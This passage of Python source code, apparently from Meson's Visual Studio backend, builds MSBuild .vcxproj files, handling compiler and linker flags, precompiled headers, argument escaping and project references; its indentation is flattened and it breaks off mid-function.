lang = self.lang_from_source_file(i)
if lang not in languages:
languages.append(lang)
elif self.environment.is_library(i):
pass
else:
# Everything that is not an object or source file is considered a header.
headers.append(i)
return sources, headers, objects, languages
def target_to_build_root(self, target):
if self.get_target_dir(target) == '':
return ''
directories = os.path.normpath(self.get_target_dir(target)).split(os.sep)
return os.sep.join(['..'] * len(directories))
def quote_arguments(self, arr):
return ['"%s"' % i for i in arr]
def add_project_reference(self, root, include, projid, link_outputs=False):
ig = ET.SubElement(root, 'ItemGroup')
pref = ET.SubElement(ig, 'ProjectReference', Include=include)
ET.SubElement(pref, 'Project').text = '{%s}' % projid
if not link_outputs:
# Do not link in generated .lib files from dependencies automatically.
# We only use the dependencies for ordering and link in the generated
# objects and .lib files manually.
ET.SubElement(pref, 'LinkLibraryDependencies').text = 'false'
def add_target_deps(self, root, target):
target_dict = {target.get_id(): target}
for dep in self.get_target_deps(target_dict).values():
if dep.get_id() in self.handled_target_deps[target.get_id()]:
# This dependency was already handled manually.
continue
relpath = self.get_target_dir_relative_to(dep, target)
vcxproj = os.path.join(relpath, dep.get_id() + '.vcxproj')
tid = self.environment.coredata.target_guids[dep.get_id()]
self.add_project_reference(root, vcxproj, tid)
def create_basic_crap(self, target, guid):
project_name = target.name
root = ET.Element('Project', {'DefaultTargets': "Build",
'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'})
confitems = ET.SubElement(root, 'ItemGroup', {'Label': 'ProjectConfigurations'})
prjconf = ET.SubElement(confitems, 'ProjectConfiguration',
{'Include': self.buildtype + '|' + self.platform})
p = ET.SubElement(prjconf, 'Configuration')
p.text = self.buildtype
pl = ET.SubElement(prjconf, 'Platform')
pl.text = self.platform
globalgroup = ET.SubElement(root, 'PropertyGroup', Label='Globals')
guidelem = ET.SubElement(globalgroup, 'ProjectGuid')
guidelem.text = '{%s}' % guid
kw = ET.SubElement(globalgroup, 'Keyword')
kw.text = self.platform + 'Proj'
p = ET.SubElement(globalgroup, 'Platform')
p.text = self.platform
pname = ET.SubElement(globalgroup, 'ProjectName')
pname.text = project_name
if self.windows_target_platform_version:
ET.SubElement(globalgroup, 'WindowsTargetPlatformVersion').text = self.windows_target_platform_version
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.Default.props')
type_config = ET.SubElement(root, 'PropertyGroup', Label='Configuration')
ET.SubElement(type_config, 'ConfigurationType')
ET.SubElement(type_config, 'CharacterSet').text = 'MultiByte'
ET.SubElement(type_config, 'UseOfMfc').text = 'false'
if self.platform_toolset:
ET.SubElement(type_config, 'PlatformToolset').text = self.platform_toolset
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.props')
direlem = ET.SubElement(root, 'PropertyGroup')
fver = ET.SubElement(direlem, '_ProjectFileVersion')
fver.text = self.project_file_version
outdir = ET.SubElement(direlem, 'OutDir')
outdir.text = '.\\'
intdir = ET.SubElement(direlem, 'IntDir')
intdir.text = target.get_id() + '\\'
tname = ET.SubElement(direlem, 'TargetName')
tname.text = target.name
return root
def gen_run_target_vcxproj(self, target, ofname, guid):
root = self.create_basic_crap(target, guid)
if not target.command:
# FIXME: This is an alias target that doesn't run any command, there
# is probably a better way than running a this dummy command.
cmd_raw = python_command + ['-c', 'exit']
else:
_, _, cmd_raw = self.eval_custom_target_command(target)
depend_files = self.get_custom_target_depend_files(target)
target_env = self.get_run_target_env(target)
wrapper_cmd, _ = self.as_meson_exe_cmdline(target.name, target.command[0], cmd_raw[1:],
force_serialize=True, env=target_env,
verbose=True)
self.add_custom_build(root, 'run_target', ' '.join(self.quote_arguments(wrapper_cmd)),
deps=depend_files)
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.targets')
self.add_regen_dependency(root)
self.add_target_deps(root, target)
self._prettyprint_vcxproj_xml(ET.ElementTree(root), ofname)
def gen_custom_target_vcxproj(self, target, ofname, guid):
root = self.create_basic_crap(target, guid)
# We need to always use absolute paths because our invocation is always
# from the target dir, not the build root.
target.absolute_paths = True
(srcs, ofilenames, cmd) = self.eval_custom_target_command(target, True)
depend_files = self.get_custom_target_depend_files(target, True)
# Always use a wrapper because MSBuild eats random characters when
# there are many arguments.
tdir_abs = os.path.join(self.environment.get_build_dir(), self.get_target_dir(target))
extra_bdeps = target.get_transitive_build_target_deps()
wrapper_cmd, _ = self.as_meson_exe_cmdline(target.name, target.command[0], cmd[1:],
# All targets run from the target dir
workdir=tdir_abs,
extra_bdeps=extra_bdeps,
capture=ofilenames[0] if target.capture else None,
force_serialize=True,
env=target.env)
if target.build_always_stale:
# Use a nonexistent file to always consider the target out-of-date.
ofilenames += [self.nonexistent_file(os.path.join(self.environment.get_scratch_dir(),
'outofdate.file'))]
self.add_custom_build(root, 'custom_target', ' '.join(self.quote_arguments(wrapper_cmd)),
deps=wrapper_cmd[-1:] + srcs + depend_files, outputs=ofilenames,
verify_files=not target.build_always_stale)
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.targets')
self.generate_custom_generator_commands(target, root)
self.add_regen_dependency(root)
self.add_target_deps(root, target)
self._prettyprint_vcxproj_xml(ET.ElementTree(root), ofname)
@classmethod
def lang_from_source_file(cls, src):
ext = src.split('.')[-1]
if ext in compilers.c_suffixes:
return 'c'
if ext in compilers.cpp_suffixes:
return 'cpp'
raise MesonException('Could not guess language from source file %s.' % src)
def add_pch(self, pch_sources, lang, inc_cl):
if lang in pch_sources:
self.use_pch(pch_sources, lang, inc_cl)
def create_pch(self, pch_sources, lang, inc_cl):
pch = ET.SubElement(inc_cl, 'PrecompiledHeader')
pch.text = 'Create'
self.add_pch_files(pch_sources, lang, inc_cl)
def use_pch(self, pch_sources, lang, inc_cl):
pch = ET.SubElement(inc_cl, 'PrecompiledHeader')
pch.text = 'Use'
header = self.add_pch_files(pch_sources, lang, inc_cl)
pch_include = ET.SubElement(inc_cl, 'ForcedIncludeFiles')
pch_include.text = header + ';%(ForcedIncludeFiles)'
def add_pch_files(self, pch_sources, lang, inc_cl):
header = os.path.basename(pch_sources[lang][0])
pch_file = ET.SubElement(inc_cl, 'PrecompiledHeaderFile')
# When USING PCHs, MSVC will not do the regular include
# directory lookup, but simply use a string match to find the
# PCH to use. That means the #include directive must match the
# pch_file.text used during PCH CREATION verbatim.
# When CREATING a PCH, MSVC will do the include directory
# lookup to find the actual PCH header to use. Thus, the PCH
# header must either be in the include_directories of the target
# or be in the same directory as the PCH implementation.
pch_file.text = header
pch_out = ET.SubElement(inc_cl, 'PrecompiledHeaderOutputFile')
pch_out.text = '$(IntDir)$(TargetName)-%s.pch' % lang
return header
def is_argument_with_msbuild_xml_entry(self, entry):
# Remove arguments that have a top level XML entry so
# they are not used twice.
# FIXME add args as needed.
if entry[1:].startswith('fsanitize'):
return True
return entry[1:].startswith('M')
def add_additional_options(self, lang, parent_node, file_args):
args = []
for arg in file_args[lang].to_native():
if self.is_argument_with_msbuild_xml_entry(arg):
continue
if arg == '%(AdditionalOptions)':
args.append(arg)
else:
args.append(self.escape_additional_option(arg))
ET.SubElement(parent_node, "AdditionalOptions").text = ' '.join(args)
def add_preprocessor_defines(self, lang, parent_node, file_defines):
defines = []
for define in file_defines[lang]:
if define == '%(PreprocessorDefinitions)':
defines.append(define)
else:
defines.append(self.escape_preprocessor_define(define))
ET.SubElement(parent_node, "PreprocessorDefinitions").text = ';'.join(defines)
def add_include_dirs(self, lang, parent_node, file_inc_dirs):
dirs = file_inc_dirs[lang]
ET.SubElement(parent_node, "AdditionalIncludeDirectories").text = ';'.join(dirs)
@staticmethod
def has_objects(objects, additional_objects, generated_objects):
# Ignore generated objects, those are automatically used by MSBuild because they are part of
# the CustomBuild Outputs.
return len(objects) + len(additional_objects) > 0
@staticmethod
def add_generated_objects(node, generated_objects):
# Do not add generated objects to project file. Those are automatically used by MSBuild, because
# they are part of the CustomBuild Outputs.
return
@staticmethod
def escape_preprocessor_define(define):
# See: https://msdn.microsoft.com/en-us/library/bb383819.aspx
table = str.maketrans({'%': '%25', '$': '%24', '@': '%40',
"'": '%27', ';': '%3B', '?': '%3F', '*': '%2A',
# We need to escape backslash because it'll be un-escaped by
# Windows during process creation when it parses the arguments
# Basically, this converts `\` to `\\`.
'\\': '\\\\'})
return define.translate(table)
@staticmethod
def escape_additional_option(option):
# See: https://msdn.microsoft.com/en-us/library/bb383819.aspx
table = str.maketrans({'%': '%25', '$': '%24', '@': '%40',
"'": '%27', ';': '%3B', '?': '%3F', '*': '%2A', ' ': '%20'})
option = option.translate(table)
# Since we're surrounding the option with ", if it ends in \ that will
# escape the " when the process arguments are parsed and the starting
# " will not terminate. So we escape it if that's the case. I'm not
# kidding, this is how escaping works for process args on Windows.
if option.endswith('\\'):
option += '\\'
return f'"{option}"'
@staticmethod
def split_link_args(args):
"""
Split a list of link arguments into three lists:
* library search paths
* library filenames (or paths)
* other link arguments
"""
lpaths = []
libs = []
other = []
for arg in args:
if arg.startswith('/LIBPATH:'):
lpath = arg[9:]
# De-dup library search paths by removing older entries when
# a new one is found. This is necessary because unlike other
# search paths such as the include path, the library is
# searched for in the newest (right-most) search path first.
if lpath in lpaths:
lpaths.remove(lpath)
lpaths.append(lpath)
elif arg.startswith(('/', '-')):
other.append(arg)
# It's ok if we miss libraries with non-standard extensions here.
# They will go into the general link arguments.
elif arg.endswith('.lib') or arg.endswith('.a'):
# De-dup
if arg not in libs:
libs.append(arg)
else:
other.append(arg)
return lpaths, libs, other
def _get_cl_compiler(self, target):
for lang, c in target.compilers.items():
if lang in ('c', 'cpp'):
return c
# No source files, only objects, but we still need a compiler, so
# return a found compiler
if len(target.objects) > 0:
for lang, c in self.environment.coredata.compilers[target.for_machine].items():
if lang in ('c', 'cpp'):
return c
raise MesonException('Could not find a C or C++ compiler. MSVC can only build C/C++ projects.')
def _prettyprint_vcxproj_xml(self, tree, ofname):
ofname_tmp = ofname + '~'
tree.write(ofname_tmp, encoding='utf-8', xml_declaration=True)
# ElementTree can not do prettyprinting so do it manually
doc = xml.dom.minidom.parse(ofname_tmp)
with open(ofname_tmp, 'w', encoding='utf-8') as of:
of.write(doc.toprettyxml())
replace_if_different(ofname, ofname_tmp)
def gen_vcxproj(self, target, ofname, guid):
mlog.debug('Generating vcxproj %s.' % target.name)
subsystem = 'Windows'
self.handled_target_deps[target.get_id()] = []
if isinstance(target, build.Executable):
conftype = 'Application'
if target.gui_app is not None:
if not target.gui_app:
subsystem = 'Console'
else:
# If someone knows how to set the version properly,
# please send a patch.
subsystem = target.win_subsystem.split(',')[0]
elif isinstance(target, build.StaticLibrary):
conftype = 'StaticLibrary'
elif isinstance(target, build.SharedLibrary):
conftype = 'DynamicLibrary'
elif isinstance(target, build.CustomTarget):
return self.gen_custom_target_vcxproj(target, ofname, guid)
elif isinstance(target, build.RunTarget):
return self.gen_run_target_vcxproj(target, ofname, guid)
else:
raise MesonException('Unknown target type for %s' % target.get_basename())
# Prefix to use to access the build root from the vcxproj dir
down = self.target_to_build_root(target)
# Prefix to use to access the source tree's root from the vcxproj dir
proj_to_src_root = os.path.join(down, self.build_to_src)
# Prefix to use to access the source tree's subdir from the vcxproj dir
proj_to_src_dir = os.path.join(proj_to_src_root, self.get_target_dir(target))
(sources, headers, objects, languages) = self.split_sources(target.sources)
if self.is_unity(target):
sources = self.generate_unity_files(target, sources)
compiler = self._get_cl_compiler(target)
build_args = compiler.get_buildtype_args(self.buildtype)
build_args += compiler.get_optimization_args(self.optimization)
build_args += compiler.get_debug_args(self.debug)
build_args += compiler.sanitizer_compile_args(self.sanitize)
buildtype_link_args = compiler.get_buildtype_linker_args(self.buildtype)
vscrt_type = self.environment.coredata.options[OptionKey('b_vscrt')]
project_name = target.name
target_name = target.name
root = ET.Element('Project', {'DefaultTargets': "Build",
'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'})
confitems = ET.SubElement(root, 'ItemGroup', {'Label': 'ProjectConfigurations'})
prjconf = ET.SubElement(confitems, 'ProjectConfiguration',
{'Include': self.buildtype + '|' + self.platform})
p = ET.SubElement(prjconf, 'Configuration')
p.text = self.buildtype
pl = ET.SubElement(prjconf, 'Platform')
pl.text = self.platform
# Globals
globalgroup = ET.SubElement(root, 'PropertyGroup', Label='Globals')
guidelem = ET.SubElement(globalgroup, 'ProjectGuid')
guidelem.text = '{%s}' % guid
kw = ET.SubElement(globalgroup, 'Keyword')
kw.text = self.platform + 'Proj'
ns = ET.SubElement(globalgroup, 'RootNamespace')
ns.text = target_name
p = ET.SubElement(globalgroup, 'Platform')
p.text = self.platform
pname = ET.SubElement(globalgroup, 'ProjectName')
pname.text = project_name
if self.windows_target_platform_version:
ET.SubElement(globalgroup, 'WindowsTargetPlatformVersion').text = self.windows_target_platform_version
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.Default.props')
# Start configuration
type_config = ET.SubElement(root, 'PropertyGroup', Label='Configuration')
ET.SubElement(type_config, 'ConfigurationType').text = conftype
ET.SubElement(type_config, 'CharacterSet').text = 'MultiByte'
if self.platform_toolset:
ET.SubElement(type_config, 'PlatformToolset').text = self.platform_toolset
# FIXME: Meson's LTO support needs to be integrated here
ET.SubElement(type_config, 'WholeProgramOptimization').text = 'false'
# Let VS auto-set the RTC level
ET.SubElement(type_config, 'BasicRuntimeChecks').text = 'Default'
# Incremental linking increases code size
if '/INCREMENTAL:NO' in buildtype_link_args:
ET.SubElement(type_config, 'LinkIncremental').text = 'false'
# Build information
compiles = ET.SubElement(root, 'ItemDefinitionGroup')
clconf = ET.SubElement(compiles, 'ClCompile')
# CRT type; debug or release
if vscrt_type.value == 'from_buildtype':
if self.buildtype == 'debug':
ET.SubElement(type_config, 'UseDebugLibraries').text = 'true'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreadedDebugDLL'
else:
ET.SubElement(type_config, 'UseDebugLibraries').text = 'false'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreadedDLL'
elif vscrt_type.value == 'static_from_buildtype':
if self.buildtype == 'debug':
ET.SubElement(type_config, 'UseDebugLibraries').text = 'true'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreadedDebug'
else:
ET.SubElement(type_config, 'UseDebugLibraries').text = 'false'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreaded'
elif vscrt_type.value == 'mdd':
ET.SubElement(type_config, 'UseDebugLibraries').text = 'true'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreadedDebugDLL'
elif vscrt_type.value == 'mt':
# FIXME, wrong
ET.SubElement(type_config, 'UseDebugLibraries').text = 'false'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreaded'
elif vscrt_type.value == 'mtd':
# FIXME, wrong
ET.SubElement(type_config, 'UseDebugLibraries').text = 'true'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreadedDebug'
else:
ET.SubElement(type_config, 'UseDebugLibraries').text = 'false'
ET.SubElement(clconf, 'RuntimeLibrary').text = 'MultiThreadedDLL'
# Sanitizers
if '/fsanitize=address' in build_args:
ET.SubElement(type_config, 'EnableASAN').text = 'true'
# Debug format
if '/ZI' in build_args:
ET.SubElement(clconf, 'DebugInformationFormat').text = 'EditAndContinue'
elif '/Zi' in build_args:
ET.SubElement(clconf, 'DebugInformationFormat').text = 'ProgramDatabase'
elif '/Z7' in build_args:
ET.SubElement(clconf, 'DebugInformationFormat').text = 'OldStyle'
else:
ET.SubElement(clconf, 'DebugInformationFormat').text = 'None'
# Runtime checks
if '/RTC1' in build_args:
ET.SubElement(clconf, 'BasicRuntimeChecks').text = 'EnableFastChecks'
elif '/RTCu' in build_args:
ET.SubElement(clconf, 'BasicRuntimeChecks').text = 'UninitializedLocalUsageCheck'
elif '/RTCs' in build_args:
ET.SubElement(clconf, 'BasicRuntimeChecks').text = 'StackFrameRuntimeCheck'
# Exception handling has to be set in the xml in addition to the "AdditionalOptions" because otherwise
# cl will give warning D9025: overriding '/Ehs' with cpp_eh value
if 'cpp' in target.compilers:
eh = self.environment.coredata.options[OptionKey('eh', machine=target.for_machine, lang='cpp')]
if eh.value == 'a':
ET.SubElement(clconf, 'ExceptionHandling').text = 'Async'
elif eh.value == 's':
ET.SubElement(clconf, 'ExceptionHandling').text = 'SyncCThrow'
elif eh.value == 'none':
ET.SubElement(clconf, 'ExceptionHandling').text = 'false'
else: # 'sc' or 'default'
ET.SubElement(clconf, 'ExceptionHandling').text = 'Sync'
# End configuration
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.props')
generated_files, custom_target_output_files, generated_files_include_dirs = self.generate_custom_generator_commands(target, root)
(gen_src, gen_hdrs, gen_objs, gen_langs) = self.split_sources(generated_files)
(custom_src, custom_hdrs, custom_objs, custom_langs) = self.split_sources(custom_target_output_files)
gen_src += custom_src
gen_hdrs += custom_hdrs
gen_langs += custom_langs
# Project information
direlem = ET.SubElement(root, 'PropertyGroup')
fver = ET.SubElement(direlem, '_ProjectFileVersion')
fver.text = self.project_file_version
outdir = ET.SubElement(direlem, 'OutDir')
outdir.text = '.\\'
intdir = ET.SubElement(direlem, 'IntDir')
intdir.text = target.get_id() + '\\'
tfilename = os.path.splitext(target.get_filename())
ET.SubElement(direlem, 'TargetName').text = tfilename[0]
ET.SubElement(direlem, 'TargetExt').text = tfilename[1]
# Arguments, include dirs, defines for all files in the current target
target_args = []
target_defines = []
target_inc_dirs = []
# Arguments, include dirs, defines passed to individual files in
# a target; perhaps because the args are language-specific
#
# file_args is also later split out into defines and include_dirs in
# case someone passed those in there
file_args = {l: c.compiler_args() for l, c in target.compilers.items()}
file_defines = {l: [] for l in target.compilers}
file_inc_dirs = {l: [] for l in target.compilers}
# The order in which these compile args are added must match
# generate_single_compile() and generate_basic_compiler_args()
for l, comp in target.compilers.items():
if l in file_args:
file_args[l] += compilers.get_base_compile_args(
self.get_base_options_for_target(target), comp)
file_args[l] += comp.get_option_compile_args(
self.environment.coredata.options)
# Add compile args added using add_project_arguments()
for l, args in self.build.projects_args[target.for_machine].get(target.subproject, {}).items():
if l in file_args:
file_args[l] += args
# Add compile args added using add_global_arguments()
# These override per-project arguments
for l, args in self.build.global_args[target.for_machine].items():
if l in file_args:
file_args[l] += args
# Compile args added from the env or cross file: CFLAGS/CXXFLAGS, etc. We want these
# to override all the defaults, but not the per-target compile args.
for l in file_args.keys():
opts = self.environment.coredata.options[OptionKey('args', machine=target.for_machine, lang=l)]
file_args[l] += opts.value
for args in file_args.values():
# This is where Visual Studio will insert target_args, target_defines,
# etc, which are added later from external deps (see below).
args += ['%(AdditionalOptions)', '%(PreprocessorDefinitions)', '%(AdditionalIncludeDirectories)']
# Add custom target dirs as includes automatically, but before
# target-specific include dirs. See _generate_single_compile() in
# the ninja backend for caveats.
args += ['-I' + arg for arg in generated_files_include_dirs]
# Add include dirs from the `include_directories:` kwarg on the target
# and from `include_directories:` of internal deps of the target.
#
# Target include dirs should override internal deps include dirs.
# This is handled in BuildTarget.process_kwargs()
#
# Include dirs from internal deps should override include dirs from
# external deps and must maintain the order in which they are
# specified. Hence, we must reverse so that the order is preserved.
#
# These are per-target, but we still add them as per-file because we
# need them to be looked in first.
for d in reversed(target.get_include_dirs()):
# reversed is used to keep order of includes
for i in reversed(d.get_incdirs()):
curdir = os.path.join(d.get_curdir(), i)
args.append('-I' + self.relpath(curdir, target.subdir)) # build dir
args.append('-I' + os.path.join(proj_to_src_root, curdir)) # src dir
for i in d.get_extra_build_dirs():
curdir = os.path.join(d.get_curdir(), i)
args.append('-I' + self.relpath(curdir, target.subdir)) # build dir
# Add per-target compile args, f.ex, `c_args : ['/DFOO']`. We set these
# near the end since these are supposed to override everything else.
for l, args in target.extra_args.items():
if l in file_args:
file_args[l] += args
# The highest priority includes. In order of directory search:
# target private dir, target build dir, target source dir
for args in file_args.values():
t_inc_dirs = [self.relpath(self.get_target_private_dir(target),
self.get_target_dir(target))]
if target.implicit_include_directories:
t_inc_dirs += ['.', proj_to_src_dir]
args += ['-I' + arg for arg in t_inc_dirs]
# Split preprocessor defines and include directories out of the list of
# all extra arguments. The rest go into %(AdditionalOptions).
for l, args in file_args.items():
for arg in args[:]:
if arg.startswith(('-D', '/D')) or arg == '%(PreprocessorDefinitions)':
file_args[l].remove(arg)
# Don't escape the marker
if arg == '%(PreprocessorDefinitions)':
define = arg
else:
define = arg[2:]
# De-dup
if define not in file_defines[l]:
file_defines[l].append(define)
elif arg.startswith(('-I', '/I')) or arg == '%(AdditionalIncludeDirectories)':
file_args[l].remove(arg)
# Don't escape the marker
if arg == '%(AdditionalIncludeDirectories)':
inc_dir = arg
else:
inc_dir = arg[2:]
# De-dup
if inc_dir not in file_inc_dirs[l]:
file_inc_dirs[l].append(inc_dir)
# Add include dirs to target as well so that "Go to Document" works in headers
if inc_dir not in target_inc_dirs:
target_inc_dirs.append(inc_dir)
# Split compile args needed to find external dependencies
# Link args are added while generating the link command
for d in reversed(target.get_external_deps()):
# Cflags required by external deps might have UNIX-specific flags,
# so filter them out if needed
if isinstance(d, dependencies.OpenMPDependency):
ET.SubElement(clconf, 'OpenMPSupport').text = 'true'
else:
d_compile_args = compiler.unix_args_to_native(d.get_compile_args())
for arg in d_compile_args:
if arg.startswith(('-D', '/D')):
define = arg[2:]
# De-dup
if define in target_defines:
target_defines.remove(define)
target_defines.append(define)
elif arg.startswith(('-I', '/I')):
inc_dir = arg[2:]
# De-dup
if inc_dir not in target_inc_dirs:
target_inc_dirs.append(inc_dir)
else:
target_args.append(arg)
languages += gen_langs
if '/Gw' in build_args:
target_args.append('/Gw')
if len(target_args) > 0:
target_args.append('%(AdditionalOptions)')
ET.SubElement(clconf, "AdditionalOptions").text = ' '.join(target_args)
ET.SubElement(clconf, 'AdditionalIncludeDirectories').text = ';'.join(target_inc_dirs)
target_defines.append('%(PreprocessorDefinitions)')
ET.SubElement(clconf, 'PreprocessorDefinitions').text = ';'.join(target_defines)
ET.SubElement(clconf, 'FunctionLevelLinking').text = 'true'
# Warning level
warning_level = self.get_option_for_target(OptionKey('warning_level'), target)
ET.SubElement(clconf, 'WarningLevel').text = 'Level' + str(1 + int(warning_level))
if self.get_option_for_target(OptionKey('werror'), target):
ET.SubElement(clconf, 'TreatWarningAsError').text = 'true'
# Optimization flags
o_flags = split_o_flags_args(build_args)
if '/Ox' in o_flags:
ET.SubElement(clconf, 'Optimization').text = 'Full'
elif '/O2' in o_flags:
ET.SubElement(clconf, 'Optimization').text = 'MaxSpeed'
elif '/O1' in o_flags:
ET.SubElement(clconf, 'Optimization').text = 'MinSpace'
elif '/Od' in o_flags:
ET.SubElement(clconf, 'Optimization').text = 'Disabled'
if '/Oi' in o_flags:
ET.SubElement(clconf, 'IntrinsicFunctions').text = 'true'
if '/Ob1' in o_flags:
ET.SubElement(clconf, 'InlineFunctionExpansion').text = 'OnlyExplicitInline'
elif '/Ob2' in o_flags:
ET.SubElement(clconf, 'InlineFunctionExpansion').text = 'AnySuitable'
# Size-preserving flags
if '/Os' in o_flags:
ET.SubElement(clconf, 'FavorSizeOrSpeed').text = 'Size'
else:
ET.SubElement(clconf, 'FavorSizeOrSpeed').text = 'Speed'
# Note: SuppressStartupBanner is /NOLOGO and is 'true' by default
pch_sources = {}
if self.environment.coredata.options.get(OptionKey('b_pch')):
for lang in ['c', 'cpp']:
pch = target.get_pch(lang)
if not pch:
continue
if compiler.id == 'msvc':
if len(pch) == 1:
# Auto generate PCH.
src = os.path.join(down, self.create_msvc_pch_implementation(target, lang, pch[0]))
pch_header_dir = os.path.dirname(os.path.join(proj_to_src_dir, pch[0]))
else:
src = os.path.join(proj_to_src_dir, pch[1])
pch_header_dir = None
pch_sources[lang] = [pch[0], src, lang, pch_header_dir]
else:
# I don't know whether its relevant but let's handle other compilers
# used with a vs backend
pch_sources[lang] = [pch[0], None, lang, None]
resourcecompile = ET.SubElement(compiles, 'ResourceCompile')
ET.SubElement(resourcecompile, 'PreprocessorDefinitions')
# Linker options
link = ET.SubElement(compiles, 'Link')
extra_link_args = compiler.compiler_args()
# FIXME: Can these buildtype linker args be added as tags in the
# vcxproj file (similar to buildtype compiler args) instead of in
# AdditionalOptions?
extra_link_args += compiler.get_buildtype_linker_args(self.buildtype)
# Generate Debug info
if self.debug:
self.generate_debug_information(link)
else:
ET.SubElement(link, 'GenerateDebugInformation').text = 'false'
if not isinstance(target, build.StaticLibrary):
if isinstance(target, build.SharedModule):
options = self.environment.coredata.options
extra_link_args += compiler.get_std_shared_module_link_args(options)
# Add link args added using add_project_link_arguments()
extra_link_args += self.build.get_project_link_args(compiler, target.subproject, target.for_machine)
# Add link args added using add_global_link_arguments()
# These override per-project link arguments
extra_link_args += self.build.get_global_link_args(compiler, target.for_machine)
# Link args added from the env: LDFLAGS, or the cross file. We want
# these to override all the defaults but not the per-target link
# args.
extra_link_args += self.environment.coredata.get_external_link_args(target.for_machine, compiler.get_language())
# Only non-static built targets need link args and link dependencies
extra_link_args += target.link_args
# External deps must be last because target link libraries may depend on them.
for dep in target.get_external_deps():
# Extend without reordering or de-dup to preserve `-L -l` sets
# https://github.com/mesonbuild/meson/issues/1718
if isinstance(dep, dependencies.OpenMPDependency):
ET.SubElement(clconf, 'OpenMPSuppport').text = 'true'
else:
extra_link_args.extend_direct(dep.get_link_args())
for d in target.get_dependencies():
if isinstance(d, build.StaticLibrary):
for dep in d.get_external_deps():
if isinstance(dep, dependencies.OpenMPDependency):
ET.SubElement(clconf, 'OpenMPSuppport').text = 'true'
else:
extra_link_args.extend_direct(dep.get_link_args())
# Add link args for c_* or cpp_* build options. Currently this only
# adds c_winlibs and cpp_winlibs when building for Windows. This needs
# to be after all internal and external libraries so that unresolved
# symbols from those can be found here. This is needed when the
# *_winlibs that we want to link to are static mingw64 libraries.
extra_link_args += compiler.get_option_link_args(self.environment.coredata.options)
(additional_libpaths, additional_links, extra_link_args) = self.split_link_args(extra_link_args.to_native())
# Add more libraries to be linked if needed
for t in target.get_dependencies():
if isinstance(t, build.CustomTargetIndex):
# We don't need the actual project here, just the library name
lobj = t
else:
lobj = self.build.targets[t.get_id()]
linkname = os.path.join(down, self.get_target_filename_for_linking(lobj))
if t in target.link_whole_targets:
# /WHOLEARCHIVE:foo must go into AdditionalOptions
extra_link_args += compiler.get_link_whole_for(linkname)
# To force Visual Studio to build this project even though it
# has no sources, we include a reference to the vcxproj file
# that builds this target. Technically we should add this only
# if the current target has no sources, but it doesn't hurt to
# have 'extra' references.
trelpath = self.get_target_dir_relative_to(t, target)
tvcxproj = os.path.join(trelpath, t.get_id() + '.vcxproj')
tid = self.environment.coredata.target_guids[t.get_id()]
self.add_project_reference(root, tvcxproj, tid, link_outputs=True)
# Mark the dependency as already handled to not have
# multiple references to the same target.
self.handled_target_deps[target.get_id()].append(t.get_id())
else:
# Other libraries go into AdditionalDependencies
if linkname not in additional_links:
additional_links.append(linkname)
for lib in self.get_custom_target_provided_libraries(target):
additional_links.append(self.relpath(lib, self.get_target_dir(target)))
additional_objects = []
for o in self.flatten_object_list(target, down):
assert(isinstance(o, str))
additional_objects.append(o)
for o in custom_objs:
additional_objects.append(o)
if len(extra_link_args) > 0:
extra_link_args.append('%(AdditionalOptions)')
ET.SubElement(link, "AdditionalOptions").text = ' '.join(extra_link_args)
if len(additional_libpaths) > 0:
additional_libpaths.insert(0, '%(AdditionalLibraryDirectories)')
ET.SubElement(link, 'AdditionalLibraryDirectories').text = ';'.join(additional_libpaths)
if len(additional_links) > 0:
additional_links.append('%(AdditionalDependencies)')
ET.SubElement(link, 'AdditionalDependencies').text = ';'.join(additional_links)
ofile = ET.SubElement(link, 'OutputFile')
ofile.text = '$(OutDir)%s' % target.get_filename()
subsys = ET.SubElement(link, 'SubSystem')
subsys.text = subsystem
if (isinstance(target, build.SharedLibrary) or isinstance(target, build.Executable)) and target.get_import_filename():
# DLLs built with MSVC always have an import library except when
# they're data-only DLLs, but we don't support those yet.
ET.SubElement(link, 'ImportLibrary').text = target.get_import_filename()
if isinstance(target, build.SharedLibrary):
# Add module definitions file, if provided
if target.vs_module_defs:
relpath = os.path.join(down, target.vs_module_defs.rel_to_builddir(self.build_to_src))
ET.SubElement(link, 'ModuleDefinitionFile').text = relpath
if self.debug:
pdb = ET.SubElement(link, 'ProgramDataBaseFileName')
pdb.text = '$(OutDir}%s.pdb' % target_name
targetmachine = ET.SubElement(link, 'TargetMachine')
targetplatform = self.platform.lower()
if targetplatform == 'win32':
targetmachine.text = 'MachineX86'
elif targetplatform == 'x64':
targetmachine.text = 'MachineX64'
elif targetplatform == 'arm':
targetmachine.text = 'MachineARM'
elif targetplatform == 'arm64':
targetmachine.text = 'MachineARM64'
elif targetplatform == 'arm64ec':
targetmachine.text = 'MachineARM64EC'
else:
raise MesonException('Unsupported Visual Studio target machine: ' + targetplatform)
# /nologo
ET.SubElement(link, 'SuppressStartupBanner').text = 'true'
# /release
if not self.environment.coredata.get_option(OptionKey('debug')):
ET.SubElement(link, 'SetChecksum').text = 'true'
meson_file_group = ET.SubElement(root, 'ItemGroup')
ET.SubElement(meson_file_group, 'None', Include=os.path.join(proj_to_src_dir, build_filename))
# Visual Studio can't load projects that present duplicated items. Filter them out
# by keeping track of already added paths.
def path_normalize_add(path, lis):
normalized = os.path.normcase(os.path.normpath(path))
if normalized not in lis:
lis.append(normalized)
return True
else:
return False
previous_includes = []
if len(headers) + len(gen_hdrs) + len(target.extra_files) + len(pch_sources) > 0:
inc_hdrs = ET.SubElement(root, 'ItemGroup')
for h in headers:
relpath = os.path.join(down, h.rel_to_builddir(self.build_to_src))
if path_normalize_add(relpath, previous_includes):
